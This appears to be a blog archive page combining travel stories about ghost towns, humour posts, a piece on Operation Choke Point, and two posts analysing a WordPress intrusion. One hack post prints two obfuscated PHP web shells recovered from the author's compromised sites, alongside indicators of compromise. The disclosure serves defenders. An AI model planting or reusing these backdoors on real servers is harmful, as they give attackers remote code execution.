Two Chaosbunnies in the Desert: Plans, we have them!

Part 1 of this saga is here. Part 7 of this saga is here.
Part 2 of this saga is here. Part 8 of this saga is here.
Part 3 of this saga is here. Part 9 of this saga is here.
Part 4 of this saga is here. Part 10 of this saga is here.
Part 5 of this saga is here. Part 11 of this saga is here.
Part 6 of this saga is here. Part 12 of this saga is here.

It is a truth often acknowledged that I am not a master of the art of planning. I’ve heard people speak of the many wonderful things that can be accomplished by planning, but the details of this arcane practice have generally been a bit fuzzy to me.

When emanix and I decided to tour the various ghost towns of the Pacific Northwest, I do what I always do: I turned to the Internet. A quick Google search for “ghost towns pacific northwest” turned up a Web site called, logically enough, ghosttowns.com where I could click on states and counties and see lists of ghost towns. Precisely the thing you need if you want to, say, visit ghost towns, right?

As it turns out, it’s not that simple. The site hasn’t been updated in a while, and on top of that, may folks seem to have a…generous definition of “ghost town.”

So it was with the ghost town of Liberty, Washington, a place that was first settled as a gold mining town in the 1800s. We were promised many wonderful things in Liberty. Fresh from the disappointment of Goodnoe, which was less “ghost town” than “a c ouple of old buildings in the middle of a farm,” we set off for Liberty.

Now, it should be mentioned here that the Pacific Northwest is in the New World, and more specifically, in North America. So you can probably understand our confusion, dear readers, when we came upon a sign pointing the way to Stonehenge.

Intrigued, we followed the sign, and discovered…Stonehenge. But not Stonehenge as it is now, oh no. Stonehenge as it was when it was still in operation, in the dim and distant past.

We found a plaque that failed to shed as much light as perhaps it thought it did. Apparently, a Quaker anti-war activist commissioned a 1:1 scale model of Stonehenge in Washington as an anti-war memorial. His reasoning, which I will confess left me scratching my head, was that the original Stonehenge was used for human sacrifice, but the ultimate form of human sacrifice is war, and therefore a model of Stonehenge would be a good anti-war memorial for reasons not clear to your humble scribe. (As it turns out, the original wasn’t used for human sacrifice, it being an observatory and all. I’m not sure what that does to the metaphor.)

Still, it is quite a fantastic place.

We had a discussion about whether or not building a model of Stonehenge in the US counts as cultural appropriation. Can the US culturally appropriate Great Britain’s history?

A quick meal later, I was able to check “have grilled cheese sandwiches prepared on the back of a van at Stonehenge” from my bucket list.

And once again we set off, toward Liberty. Which, after many hours of driving, turned out to be…a still-living town whose residents have made a cottage industry out of promoting as a ghost town.

I have no photos to show you of Liberty, because it seemed weird to us to run around taking pictures of a town that was still very much occupied.

We drove through the town, disappointed, and found a narrow dirt track leading up into the mountains. Thinking, perhaps somewhat optimistically, that anything appropriately decrepit and abandoned might more likely be found on a narrow dirt track in the mountains than on a busy paved road, we ventured up the trail, thinking “we’re heading into the mountains at dusk in a 22-year-old van, what’s the worst that can happen?”

The road got steeper and rougher, then steeper and rougher still, and we soon found ourselves well and truly in the middle of nowhere and facing the unenviable prospect of retracing our steps after dark.

The nice thing about adventuring in the Adventure Van is we always have a bed with us, so we parked on the top of the mountain, surrounded by fantastic scenery, and did precisely that. The view from the campsite looked like this:

emanix has, it must be said, some epic mad camping skillz, which she demonstrated by building a fire and cooking dinner for us.

The day made obvious to us a small but significant flaw in my cunning plan. Clearly, if we were going to make the most of this adventure, we would need some way to separate the wheat from the chaff and focus our effort on only those ghost towns most likely to give us the best bang for our buck.

I’d like to say it was I who came up with the missing ingredient in our earlier plan, gentle readers, but that would be a filthy, filthy lie. It was in fact emanix who got the idea that would set things aright…but that’s a story for the next chapter.

Sisters of Cathy

Cathy is a long-running comic strip that premiered in 1972 and has graced the pages of American newspapers for the last four decades. In all that time, the entirety of the strip has revolved around five jokes: Cathy is insecure about her weight, Cathy is insecure in her job, Cathy is insecure in her relationship, OMG gender roles, and Cathy likes to shop.

But what if…

What if the insipid innocence of the strip hides a dark secret? What if the world of Cathy is a more dangerous and dramatic place than it seems? What if Cathy lives a secret life of sinister plots and awesome goth music? What if…Cathy is really the heroine of every Sisters of Mercy song?

It turns out it works rather well.

Ladies and gentlemen, may I present: Sisters of Cathy.

My two favorite strips are posted for my backers over on my Patreon blog.

Movie Review: Inside Out

I will admit to some small measure of skepticism when I first learned of Inside Out, the new animated movie from Pixar. The premise of the movie is we all have emotions living inside us, you see, that look kind of like us except Fear (which resembles a purple Al Pacino, only skinnier), and Anger, which I don’t know what the hell it looks like, but it’s red.

But it’s Pixar, and Pixar is usually a pretty safe bet. They gave us Up, Toy Story, The Shining, Finding Nemo, and Brave, so I figured I’d give the movie a shot.


Al Pacino in Pixar’s hit movie The Shining

The movie begins with the birth of the main character Ripley Riley, who is dragged non-consensually into the world nine months after the end of last year’s surprise Pixar hit, Carnal Encounters of the Barest Kind. Upon the abrupt cessation of her non-existence, Ripley Riley begins to feel her first emotions, hilariously voiced by Al Pacino, gruff Al Pacino, Sigourney Weaver, unhappy Sigourney Weaver, and smug Sigourney Weaver.

Ripley Riley grows up in an idyllic Minnesota town, where she faces the normal challenges any young woman encounters on the path to maturity: she learns to play hockey, builds relationships with her parents and friends, goes to school, and drives a loader (in one particularly poignant scene, she gets a Class Two rating after her flight license is revoked).

The rest of the movie goes something like this:

Avast, ye landlubbers, there be spoilers below!

Two Chaosbunnies in the Desert: The Beginning

Part 1 of this saga is here. Part 7 of this saga is here.
Part 2 of this saga is here. Part 8 of this saga is here.
Part 3 of this saga is here. Part 9 of this saga is here.
Part 4 of this saga is here. Part 10 of this saga is here.
Part 5 of this saga is here. Part 11 of this saga is here.
Part 6 of this saga is here. Part 12 of this saga is here.

So there we were, in the middle of the California desert, atop a mountain at 8500 feet where the sun was so brutal it burned us through our clothing and the air was so thin that walking a dozen yards meant sitting down to rest, surrounded by the ruins of cutting edge Victorian technology…

But maybe I should back up a little.

It all happened because emanix is an artist, and land in Britain is scarce and expensive.

The part about her being an artist is important because she conceived an idea for a graphic novel and decided to embark on the arduous process of birthing that idea into a real thing. And the part about land being scarce in the United Kingdom? There are no ghost towns there. People don’t pack up and abandon entire cities, leaving them to crumble quietly into dust.

But I’m getting ahead of myself again.

So, the graphic novel. It’s set in a ghost town, you see. And ghost towns, well, they’re as thin on the ground where she lives as snowmen in the Philippines.

So it came to pass that she flew across the pond to Portland, and we set out to tour the many and varied ghost towns of the western United States. For background research, you see. We would, we thought, spend a few weeks living in the back of a camper van–tax-deductible, of course–surveying and photographing abandoned towns for the sake of making art.

That was the extent of our cunning plan…more a cunning intention, really. We are chaosbunnies, she and I. One does not become a chaosbunny by forming a plan and sticking to it.

I did some research, by which I mean I typed “ghost towns” into Google and typed the result into Google Maps. It chewed for a while, an enormous massive parallel supercomputer bending some small part of its mighty attention to the task of drawing dotted lines on a map of the western United States. We piled our suitcases into the van and we were off…

…to a Wal-Mart to get supplies and an oil change. Then we were off…

…to the Wal-Mart parking lot, to meet my sweetie zaiah, who had realized I’d forgotten my jacket and kindly ran it out to me. Then we were off…

…and realized we’d nearly forgotten ice for the cooler. That taken care of, we were off, on a three-week adventure that would take us nearly 4,000 miles, across narrow dirt trails winding high into the mountains and through trackless expanses of Forest Service land, looking for places where people had once lived and didn’t any more.

The thing that worried me the most was the shovel. We’d packed a shovel, emanix and I, because she felt there might be an occasion during which we might have to poop in a hole. I’ve never quite got the hand of pooping in the hole. To be honest, I tend to regard the process with some suspicion, not to mention a fair degree of horror.

Minor reservations about the shovel aside, we set off with boundless optimism to venture into the desert, just the two of us and a 22-year-old van, bunny ears perched jauntily upon our heads.

The ears I’m wearing are new, a gift from emanix to replace the previous set she gave me some five or six years ago, and which, after accompanying me on countless adventures across the globe, have become somewhat shabby and dilapidated for the wear. Shabby bunny ears are a sad thing, but everyday, around-town ears are surprisingly difficult to come by.

The first leg of our plan intention had us traveling through Washington, exploring a number of old mining towns throughout the state.

There is a saying among those who practice the art of war: a plan rarely survives contact with the enemy. It might, I think, be extended just a bit, to say a plan rarely survives contact with the enemy or a chaosbunny. Two chaosbunnies in one van is, therefore, right out. (Indeed, I suspect that should your life ever bring you into contact with two chaosbunnies in one van, you might well be advised to batten down the hatches, yo, because things likely will get interesting.)

So off we went, the two of us in a van, driving along the highway without a care in the world save for running out of gas, having a breakdown, having a breakdown in the middle of the desert, having a breakdown in the middle of the desert and running out of food or water, getting bitten by a venomous snake in the middle of the desert, having a breakdown in the middle of the desert and running out of food and water and then getting bitten by a venomous snake, and being attacked by clowns. We ventured into Washington and began searching, that first night, for a hotel to stay in, figuring that the van would be our home once the trip really got going.

We pulled into the Scenic Winds Motel…

…and immediately realized that, entirely by accident, we’d started our trip in a ghost motel.

Even Norman Bates might have some reluctance to check in here.

“Ah,” thought we, “this bodes well! We’re finding abandoned places without really trying!”

Sadly, we couldn’t actually camp here, as the proximity to the road and the rather forbidding “no trespassing” signs would, we thought, attract the attention of law enforcement, who are notorious for the absence of their sense of irony.

So we spent the night in a motel that wasn’t abandoned, and set off bright and early on the first leg of our tour.

We did actually make the first stop on our planned itinerary, at Goodnoe Hills, Washington. The Internet assured us this town, first established in the 1860s and abandoned soon thereafter, would be a productive stop. We arrived, ears still jaunty, just in time to be underwhelmed.

Which is not to say that there was nothing left of the old ghost town, only that there was almost nothing left. We discovered an abandoned house that looked like it was last decorated by human hands sometime in the most hideous part of that most hideous decade, the 70s:

There was an astonishing number of birds living in a bedroom on the second floor, and the quantity of guano was something that had to be seen to be believed. Seriously. I will see it in my nightmares for decades to come.

My parents used to have this exact phone. I haven’t seen one of these in a donkey’s age. Kids today probably wouldn’t know how to work one. No, scratch that, a lot of adults today probably wouldn’t know how to work one.

Cool, in its own ghastly way, but definitely not what we were looking for.

We had a bit better luck a few blocks down the road, for some loose definition of “blocks.” We found the ruins of a lovely old church, gradually crumbling into the dusty ground.

We weren’t able to get inside; the church was surrounded by a barbed-wire fence with dire “no trespassing” signs plastered all over it.

Still, it was quite lovely.

A bit further on, we encountered this place. Now this, we thought, was cooking with fire. This was a proper ruin, just the sort of thing we were hoping to find.

Overall, though, Goodnoe was a bit of a wash. The locals had destroyed most of the remnants of the old town and set down farms where the buildings once stood.

This would turn out to be a recurring theme in the early part of our ghost town adventures, until we figured out a new strategy that necessitated abandoning our original plan altogether.

But that’s a story for the next chapter.

Update on WordPress hack

In this blog post, I talked about a recent WordPress hack attack on two of my WordPress sites that appears to be using a zero-day vulnerability to gain administrator access to WordPress sites.

I became aware of the attack when the security plugin WordFence notified me that someone had logged in to one of my sites using a non-existent administrator user from an IP address in St. Petersburg, Russia. The malicious individual had access to the site for eight minutes, during which he created several new admin users and uploaded a malicious file to the Plugins directory giving him the ability to execute code on the site. He was in the process of attempting to upload a file to the /wp-content/uploads directory, which I terminated when I kicked him out.

About fifteen minutes later, a similar attack took place on a second WordPress site I own. Again, the user created new administrator accounts, installed a plugin that allowed him to execute code on the server, and attempted to upload files, this time to the Themes directory. I cleaned the site and kicked him off. In both cases, I moved the login page to a different URL, hen observed while the same IP address attempted to access the old login URL.

Last night, a third site I own was compromised in the same way. This site is not yet in use, and had no content, so I observed the actions of the user.

The hostile user created new admin users, uploaded the same plugin to the plugins directory, then uploaded additional files to the /wp-content/uploads directory and the /themes directory. I downloaded these files for analysis.

The files were both PHP files, uploaded to the following locations:

/wp-content/themes/twentyfifteen/inc/file.php
/wp-content/uploads/2009/sql.php

Their contents are as follows:

file.php

<?php $sF=”PCT4BA6ODSE_”;$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}[‘n703018’])) {eval($s21(${$s20}[‘n703018’]));}?>

sql.php

<?php $qV=”stop_”;$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}[‘qbc8a20’])){eval(${$s20}[‘qbc8a20’]);}?>

Again, these malicious files appear designed to allow the attacker to execute code on compromised servers.

I urge WordPress users to take the mitigating actions I describe in the previous post, linked to above, and to check their systems carefully for the presence of malicious plugins (probably named “research_plugin_” followed by a random string), unauthorized admin users, and files whose contents are anything like what I describe above. These files may be present in one or more places in the WordPress Themes or Uploads directories.

Analysis of a new WordPress attack

I run a number of WordPress sites. Running a WordPress site is an invitation to hack attacks; it’s such a popular platform that it provides an appealing target for hackers. On top of that, I have a somewhat tumultuous relationship with Eastern European organized crime that extends back quite a number of years (I’ve worked with law enforcement on high-profile attacks like this one), so I get a fair amount of attention from folks trying to DDoS, penetrate, or otherwise attack my sites.

The Attack

Last night, a hacker successfully penetrated one of the WordPress sites I own. I use a WordPress plugin called Word Fence that notifies me whenever anyone with administrator access logs in to one of my sites, so I responded and kicked the attacker out within eight minutes. Approximately fifteen minutes later, an attacker from the same IP address logged in to another WordPress site I run. I kicked him out of that site a few minutes later.

WordPress attackers often modify core WordPress files to install back doors, so I downloaded the contents of both sites, then did a nuke-and-pave with a new known-good WordPress install and moved the database to a different location.

I am still analyzing the attack, but there are a number of factors that have raised my suspicion that this may be a novel zero-day attack, not the least of which is the attacker gained access to both sites on the first login attempt without brute-forcing an administrator password (and yes, I use very robust passwords). Furthermore, the attacker logged in to an account named “admin,” and I do not create WordPress administrator accounts with that name–I always use different names for the admin accounts.

I’ve done a first pass forensic analysis of the attack. These are the characteristics I observed in both attacks:

  • The first thing the attacker does is create several new administrator accounts. These accounts have names such as “administrator;” “admin;” “admin” followed by a random two or three digit number (such as “admin52”); and “root.”
  • The attacker then creates new directories in the /plugins directory located in /wp-content. These directories are named “research_plugin_” followed by a random string of letters and numbers, such as “research_plugin_2hAs”.
  • Next, the attacker uploads malicious PHP files into these “research_plugin” directories. The PHP files are named “research_plugin.php”. Their content is located under the cut below.

Click here to see the content of the research_plugin.php file

Operation Choke Point; or, We Know What’s Best For You

Before I can really go into the things I want to talk about, I’ll need to offer you, dear readers, a bit of back story.

As many folks who’ve read this blog over the years know, I am, among many other things, a game designer. I’ve developed a game called Onyx, which I’ve maintained and sold since the mid-1990s. Onyx is a sex game. It’s designed for multiple players, who move around a virtual “game board” buying properties. When another player lands on your property, that player can pay rent or–ahem–work off the debt.

I sell Onyx on my Web site here. It’s lived there for many years, and for the past thirteen years or so, I’ve accepted credit card payments for the registered version of the game via a merchant account provider called Best Payment Solutions.

This past April, I received notification from Best Payment Solutions that they were terminating my account. They gave no reason, other than they “sometimes terminate accounts for risk reasons.” In the thirteen years I’d been with them, I’d only had one chargeback–a rather remarkable record I doubt few businesses can match. Didn’t matter.

I was told that BPS would no longer work with me, but their parent company, Vantiv, would be happy to give me a merchant account. Vantiv’s underwriters, I was told, had looked at my Web site and had no problem with its contents.

So i did the requisite paperwork, turned it all in, and…nothing. For weeks, during which time I was effectively out of business.

Then, four weeks later, I heard back from Vantiv. We’re so sorry, they said, we thought we could give you a merchant account, but we can’t. When I asked why, the only thing they would say was “risk reasons.”

Thus ensued a mad scramble to find a new merchant account underwriter, a process that’s normally very time-consuming and tedious. I finally found another underwriter, which I will decline to name for reasons that will become obvious once you read the rest of this post, and I’m back up and running again…but not before I was out of business for over a month.

Onyx registrations pay my rent, so as you might imagine, this has been a stressful time for me.


Okay, that’s the backstory. A sad tale of a merchant account underwriter that got cold feet for no clear reason, I thought. Annoying, yes, stressful, you bet. But one of those things that just kind of happens, right? Banks make business decisions all the time. So it goes.

It turns out, though, that I’m not the only one this has happened to. Indeed, it’s happened to lots and lots of people. The same pattern, across different businesses and different merchant account providers: A business receives a sudden notification that their merchant account (or in some cases, their business checking account) is being terminated. When they ask why, no answer beyond “risk reasons” is forthcoming. Porn performers, payday loan services, dating sites, fireworks sellers, porn producers, travel clubs…it’s a very specific list of folks who are having this problem. And, not surprisingly, there’s a reason for it.

The reason is the Department of Justice, which for the past couple of years has undertaken a project they call Operation Choke Point.

The goal of Operation Choke Point is to pressure businesses in morally objectionable fields out of business, by leaning on the banks that provide services to those businesses. If you can’t get banking or credit card services, the reasoning goes, you can’t stay in business. So the DoJ is approaching commercial banks, telling them to close accounts for individuals and businesses in “objectionable” industries.

It should be noted that the businesses being targeted are not breaking the law. Lawful businesses and individuals are losing access to lawful services because the government objects to them on moral grounds.

The banks being pressured to close accounts are reticent about talking about it; however, one business owner, whose instincts were in the right place, apparently managed to get a recording of a phone call in which his merchant account processor (EFT) told him they were pressured by the government to close the account. His recording has made it to a Congressional hearing looking into the program. (Some banks have reported being told that they would be investigated for racketeering if they failed to close accounts belonging to targeted businesses, despite the fact that the targeted businesses are acting lawfully.)

There’s a backlash brewing. Congress is starting to hold hearings about businesses targeted without due process. The DoJ has backtracked. The FDIC, which was involved in pressuring banks to terminate targeted businesses, has reversed course. All that is good. And yet…and yet…

I can’t help but think the backlash isn’t because people really believe the program was wrong, but rather because it included one industry that is considered politically sacrosanct by the Obama administration’s opponents: guns.

In addition to adult businesses, Operation Choke Point targeted small gun and ammo retailers. And there’s a small, cynical voice inside my head that whispers, if they had contented themselves with going after people like me–people who make or sell things related to sex–would anyone have cared? The right-wing blogosphere is filled with angry rants about Operation Choke Point, as well it should be…but none of the angry rants mention adult businesses or porn. They all focus on guns. And I just really can’t make myself believe that the people rising up against the program have my interests at heart. If it were just me, I believe we wouldn’t hear a peep out of them.

Don’t get me wrong–for once in my life, I’m glad the Republicans are taking action about something. But I hold no illusions that next time, they will still have my back.


By the time all was said and done, I lost somewhere around $700 from the problems I had. Not a lot, really, in the scheme of things, though I did have to scramble to make rent this month. It could have been worse.

I know there are a lot of folks in various adult-related businesses who read my blog. I’d really love to hear from you guys. Has this happened to you, or anyone you know? What was the outcome? Let me know!

Help make the world a sexier place!

I have a friend named Emily Bingham. She’s a rope bottom and a fetish model, and if you’ve read this blog for a while you’ve doubtless seen photos I’ve done of her, like the ones of her tied up in the ruins of an old house I posted here (link is not safe for work, of course).

What you might not know is she’s also a writer, and a damn good one at that. She’s one of the top erotica writers on Amazon (under a pseudonym), and now she’s launching a new project: a true memoir of her experiences and adventures in rope. The book is long, and covers thirty stories, some of them funny, some of them sexy, some of them heartbreaking.

And she needs your help.

Emily is running a crowdfunding campaign to finance the memoir. I’ve been lucky enough to see an early version, and it’s awesome. I highly encourage you to check out her crowdfunding and help support it.

It’s an important book. It covers the ups and downs–sex, erotica, assault, consent–of life in the world of BDSM, and does it unflinchingly and with absolute candor. It’s the kind of book we need if we’re going to help move the BDSM community in the direction of ethics and consent.

And did I mention it’s sexy?

Please, check out the crowdfunding. If it appeals to you, support it.